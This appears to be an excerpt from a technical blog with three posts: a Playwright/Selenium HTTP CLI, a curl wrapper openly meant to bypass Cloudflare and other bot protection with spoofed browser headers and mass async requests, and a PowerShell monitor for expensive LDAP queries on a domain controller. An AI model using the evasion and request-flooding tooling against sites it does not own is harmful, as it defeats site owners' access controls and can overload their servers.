  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
-X POST --form \
-d "user=user&pass=pass" \
"$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
"$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
--async --count 20 \
"$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
"https://example.com/"
"https://example.com/"
"https://example.com/"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
p = argparse.ArgumentParser(description='Minimal Selenium GET client')
p.add_argument('url')
p.add_argument('-o','--output')
p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
p.add_argument('--show-headers', action='store_true')
p.add_argument('-t','--timeout', type=int, default=30)
p.add_argument('-A','--user-agent')
p.add_argument('-v','--verbose', action='store_true')
return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
driver.set_page_load_timeout(args.timeout)
# Load cookies if present (domain-specific; best-effort)
if os.path.exists(args.cookie):
try:
ck = json.load(open(args.cookie))
for c in ck.get('cookies', []):
try:
driver.get('https://' + c.get('domain').lstrip('.'))
driver.add_cookie({
'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
'domain': c.get('domain'), 'secure': c.get('secure', False)
})
except Exception:
pass
except Exception:
pass
driver.get(args.url)
# Persist cookies (best-effort)
try:
cookies = driver.get_cookies()
json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
except Exception:
pass
if args.output:
open(args.output, 'w').write(driver.page_source)
else:
sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Resources

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash
# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color
# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false
# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
usage() {
cat << EOH
Usage: $(basename "$0") [OPTIONS] URL
Advanced curl wrapper that mimics browser behavior to bypass bot protection.
OPTIONS:
-X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
-d, --data DATA           POST/PUT data
-H, --header HEADER       Add custom header (can be used multiple times)
-o, --output FILE         Write output to file
-c, --cookie FILE         Use custom cookie file [default: temp file]
-A, --user-agent UA       Custom user agent [default: Chrome on macOS]
-t, --timeout SECONDS     Request timeout [default: 30]
--async                   Run request asynchronously in background
--count N                 Number of async requests to fire [default: 1, requires --async]
--no-redirect             Don't follow redirects
--show-headers            Show response headers
--json                    Send data as JSON (sets Content-Type)
--form                    Send data as form-urlencoded
-v, --verbose             Verbose output
-h, --help                Show this help message
EXAMPLES:
# Simple GET request
$(basename "$0") https://example.com
# Async GET request
$(basename "$0") --async https://example.com
# POST with JSON data
$(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login
# POST with form data
$(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login
# Multiple async requests (using loop)
for i in {1..10}; do
$(basename "$0") --async https://example.com/api/endpoint
done
# Multiple async requests (using --count)
$(basename "$0") --async --count 10 https://example.com/api/endpoint
EOH
exit 0
}
# Parse arguments
EXTRA_HEADERS=()
URL=""
while [[ $# -gt 0 ]]; do
case $1 in
-X|--method)
METHOD="$2"
shift 2
;;
-d|--data)
DATA="$2"
shift 2
;;
-H|--header)
EXTRA_HEADERS+=("$2")
shift 2
;;
-o|--output)
OUTPUT_FILE="$2"
shift 2
;;
-c|--cookie)
COOKIE_FILE="$2"
shift 2
;;
-A|--user-agent)
USER_AGENT="$2"
shift 2
;;
-t|--timeout)
TIMEOUT="$2"
shift 2
;;
--async)
ASYNC=true
shift
;;
--count)
COUNT="$2"
shift 2
;;
--no-redirect)
FOLLOW_REDIRECTS=false
shift
;;
--show-headers)
SHOW_HEADERS=true
shift
;;
--json)
CONTENT_TYPE="application/json"
shift
;;
--form)
CONTENT_TYPE="application/x-www-form-urlencoded"
shift
;;
-v|--verbose)
VERBOSE=true
shift
;;
-h|--help)
usage
;;
*)
if [[ -z "$URL" ]]; then
URL="$1"
else
echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
exit 1
fi
shift
;;
esac
done
# Validate URL
if [[ -z "$URL" ]]; then
echo -e "${RED}Error: URL is required${NC}" >&2
usage
fi
# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
echo -e "${RED}Error: --count requires --async${NC}" >&2
exit 1
fi
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
exit 1
fi
# Execute curl
execute_curl() {
# Build curl arguments as array instead of string
local -a curl_args=()
# Basic options
curl_args+=("--compressed")
curl_args+=("--max-time" "$TIMEOUT")
curl_args+=("--connect-timeout" "10")
curl_args+=("--http2")
# Cookies (ensure file exists to avoid curl warning)
: > "$COOKIE_FILE" 2>/dev/null || true
curl_args+=("--cookie" "$COOKIE_FILE")
curl_args+=("--cookie-jar" "$COOKIE_FILE")
# Follow redirects
if [[ "$FOLLOW_REDIRECTS" == true ]]; then
curl_args+=("--location")
fi
# Show headers
if [[ "$SHOW_HEADERS" == true ]]; then
curl_args+=("--include")
fi
# Output file
if [[ -n "$OUTPUT_FILE" ]]; then
curl_args+=("--output" "$OUTPUT_FILE")
fi
# Verbose
if [[ "$VERBOSE" == true ]]; then
curl_args+=("--verbose")
else
curl_args+=("--silent" "--show-error")
fi
# Method
curl_args+=("--request" "$METHOD")
# Browser-like headers
curl_args+=("--header" "User-Agent: $USER_AGENT")
curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
curl_args+=("--header" "Connection: keep-alive")
curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
curl_args+=("--header" "Sec-Fetch-Dest: document")
curl_args+=("--header" "Sec-Fetch-Mode: navigate")
curl_args+=("--header" "Sec-Fetch-Site: none")
curl_args+=("--header" "Sec-Fetch-User: ?1")
curl_args+=("--header" "Cache-Control: max-age=0")
# Content-Type for POST/PUT
if [[ -n "$DATA" ]]; then
if [[ -n "$CONTENT_TYPE" ]]; then
curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
fi
curl_args+=("--data" "$DATA")
fi
# Extra headers
for header in "${EXTRA_HEADERS[@]}"; do
curl_args+=("--header" "$header")
done
# URL
curl_args+=("$URL")
if [[ "$ASYNC" == true ]]; then
# Run asynchronously in background
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
# Fire multiple requests if count > 1
local pids=()
for ((i=1; i<=COUNT; i++)); do
# Run in background detached, suppress all output
nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
local pid=$!
disown $pid
pids+=("$pid")
done
if [[ "$COUNT" -eq 1 ]]; then
echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
else
echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
fi
else
# Run synchronously
if [[ "$VERBOSE" == true ]]; then
echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
fi
curl "${curl_args[@]}"
local exit_code=$?
if [[ $exit_code -ne 0 ]]; then
echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
return $exit_code
fi
fi
}
# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
rm -f "$COOKIE_FILE"
fi
}
# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
trap cleanup EXIT
fi
# Main execution
execute_curl
# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
-d '{"username":"user","password":"pass"}' \
https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
-d "username=user&password=pass" \
https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
-H "X-API-Key: your-key" \
-H "Authorization: Bearer token" \
https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"
# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
-X POST --form \
-d "user=test&pass=secret" \
https://example.com/login
# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
https://example.com/dashboard

Load testing patterns

Simple load test with –count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
./browser_curl.sh --async "$URL" > /dev/null 2>&1
((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

OptionDescriptionDefault
-X, --methodHTTP method (GET/POST/PUT/DELETE)GET
-d, --dataRequest body (JSON or form)
-H, --headerAdd extra headers (repeatable)
-o, --outputWrite response to a filestdout
-c, --cookieCookie file to use (and persist)temp file
-A, --user-agentOverride User-AgentChrome/macOS
-t, --timeoutMax request time in seconds30
--asyncRun request(s) in the backgroundfalse
--count NFire N async requests (requires --async)1
--no-redirectDon’t follow redirectsfollows
--show-headersInclude response headersfalse
--jsonSets Content-Type: application/json
--formSets Content-Type: application/x-www-form-urlencoded
-v, --verboseVerbose diagnosticsfalse
-h, --helpShow usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior
  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.

Real-world examples

Example 1: API authentication flow

cd ~/Desktop/warp
bash -c 'cat > test_auth.sh << '\''SCRIPT'\''
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"
echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d "{\"username\":\"user\",\"password\":\"pass\"}" "$API_BASE/auth/login" > /dev/null
echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .
echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"
echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh'

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
"https://example.com/page1"
"https://example.com/page2"
"https://example.com/page3"
)
for url in "${URLS[@]}"; do
echo "Fetching: $url"
./browser_curl.sh -o "$(basename "$url").html" "$url"
sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"
while true; do
if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
echo "$(date): Service healthy"
else
echo "$(date): Service unhealthy"
fi
sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available anywhere then install it on your path using:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl
echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc
echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc
echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com
# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com
# Production mode
./browser_curl.sh https://example.com

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

TestTimeRequests/sec
Single sync requestapproximately 0.2s
10 async requests (–count)approximately 0.03s333/s
100 async requests (–count)approximately 0.09s1111/s
1000 async requests (–count)approximately 0.8s1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.

Resources

Windows Domain Controller: Monitor and Log LDAP operations/queries use of resources

The script below monitors LDAP operations on a Domain Controller and logs detailed information about queries that exceed specified thresholds for execution time, CPU usage, or results returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

Parameter: ThresholdSeconds
Minimum query duration in seconds to log (default: 5)

Parameter: LogPath
Path where log files will be saved (default: C:\LDAPDiagnostics)

Parameter: MonitorDuration
How long to monitor in minutes (default: continuous)

EXAMPLE
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath “C:\Logs\LDAP”

[CmdletBinding()]
param(
[int]$ThresholdSeconds = 5,
[string]$LogPath = "C:\LDAPDiagnostics",
[int]$MonitorDuration = 0  # 0 = continuous
)
# Requires Administrator privileges
#Requires -RunAsAdministrator
# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}
$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"
function Write-Log {
param([string]$Message, [string]$Level = "INFO")
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
$logMessage = "[$timestamp] [$Level] $Message"
Write-Host $logMessage
Add-Content -Path $logFile -Value $logMessage
}
function Get-LDAPStatistics {
try {
# Query NTDS performance counters for LDAP statistics
$ldapStats = @{
ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
}
return $ldapStats
}
catch {
Write-Log "Error getting LDAP statistics: $_" "ERROR"
return $null
}
}
function Parse-LDAPEvent {
param($Event)
$eventData = @{
TimeCreated = $Event.TimeCreated
ClientIP = $null
ClientPort = $null
StartingNode = $null
Filter = $null
SearchScope = $null
AttributeSelection = $null
ServerControls = $null
VisitedEntries = $null
ReturnedEntries = $null
TimeInServer = $null
}
# Parse event XML for detailed information
try {
$xml = [xml]$Event.ToXml()
$dataNodes = $xml.Event.EventData.Data
foreach ($node in $dataNodes) {
switch ($node.Name) {
"Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
"StartingNode" { $eventData.StartingNode = $node.'#text' }
"Filter" { $eventData.Filter = $node.'#text' }
"SearchScope" { $eventData.SearchScope = $node.'#text' }
"AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
"ServerControls" { $eventData.ServerControls = $node.'#text' }
"VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
"ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
"TimeInServer" { $eventData.TimeInServer = $node.'#text' }
}
}
}
catch {
Write-Log "Error parsing event XML: $_" "WARNING"
}
return $eventData
}
Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{$MonitorDuration + ' minutes'})" "INFO"
# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
$currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
if ($currentValue.'15 Field Engineering' -lt 5) {
Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
}
else {
Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
}
}
catch {
Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}
# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader
Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"
$startTime = Get-Date
$queriesLogged = 0
try {
while ($true) {
# Check if monitoring duration exceeded
if ($MonitorDuration -gt 0) {
$elapsed = (Get-Date) - $startTime
if ($elapsed.TotalMinutes -ge $MonitorDuration) {
Write-Log "Monitoring duration reached. Stopping." "INFO"
break
}
}
# Get current LDAP statistics
$stats = Get-LDAPStatistics
if ($stats) {
Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
}
# Query Directory Service event log for expensive LDAP queries
# Event ID 1644 = expensive search operations
$events = Get-WinEvent -FilterHashtable @{
LogName = 'Directory Service'
Id = 1644
StartTime = (Get-Date).AddSeconds(-10)
} -ErrorAction SilentlyContinue
foreach ($event in $events) {
$eventData = Parse-LDAPEvent -Event $event
# Convert time in server from milliseconds to seconds
$timeInSeconds = if ($eventData.TimeInServer) { 
[int]$eventData.TimeInServer / 1000 
} else { 
0 
}
if ($timeInSeconds -ge $ThresholdSeconds) {
$queriesLogged++
Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
Write-Log "Duration: $timeInSeconds seconds" "WARNING"
Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
Write-Log "Filter: $($eventData.Filter)" "WARNING"
Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
Write-Log "======================================" "WARNING"
# Write to CSV
$csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),$($eventData.StartingNode),`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
Add-Content -Path $csvFile -Value $csvLine
}
}
Start-Sleep -Seconds 5
}
}
catch {
Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
Write-Log "Log file: $logFile" "INFO"
Write-Log "CSV file: $csvFile" "INFO"
}
```
## Usage Examples
### Basic Usage (Continuous Monitoring)
Run with default settings - monitors queries taking 5+ seconds:
```powershell
.\Diagnose-LDAPQueries.ps1
```
### Custom Threshold and Duration
Monitor for 30 minutes, logging queries that take 3+ seconds:
```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30
```
### Custom Log Location
Save logs to a specific directory:
```powershell
.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"
```
